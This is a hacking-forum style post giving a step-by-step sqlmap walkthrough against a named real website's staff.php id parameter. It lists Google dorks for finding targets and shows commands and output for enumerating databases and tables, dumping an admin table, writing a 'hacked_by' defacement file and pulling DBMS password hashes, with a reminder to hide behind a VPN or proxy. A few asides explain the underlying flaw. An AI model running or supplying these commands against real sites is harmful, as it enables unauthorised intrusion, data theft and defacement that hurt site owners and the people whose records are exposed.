hello all members!

injection tool: sqlmap

official page: http://sqlmap.org

download link: https://github.com/sqlmapproject/sqlmap/zipball/master

tested on: windows xp sp3, python 2.7.5

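vulnerability page: http://www.godwins-law.co.uk/staff.php?id=10'

(the trailing quote is the test: if the page answers with a sql error, the id value is being concatenated into the query instead of being bound as a parameter. every step below depends on that one flaw, and a parameterized query on this page closes all of them.)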

!!!!! use openvpn or proxy !!!!!

step1. target

google dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...

target: http://www.godwins-law.co.uk/staff.php?id=10

target webserver operating system: windows 2003

target webapplication: asp.net , microsoft iis 6.0 , php 5.2.8

target backenddatabase: mysql 5.0.0

step2. database

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs

--database--

godwins
information_schema

step3. table

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -d godwins --tables

--table--

adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff

step4. column & dump

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -d godwins -t adminhelp --columns

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -d godwins -t adminhelp --dump

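step5. hacked text (file write/read through the database; this depends on the site's mysql account holding the FILE privilege, which a web application account normally does not need)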

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=hacked_by_sasami_327.txt

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=hacked_by_sasami_327.txt

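step6. user & password (dbms accounts and their password hashes; these are readable only when the site's mysql account is allowed to query the mysql system tables)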

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords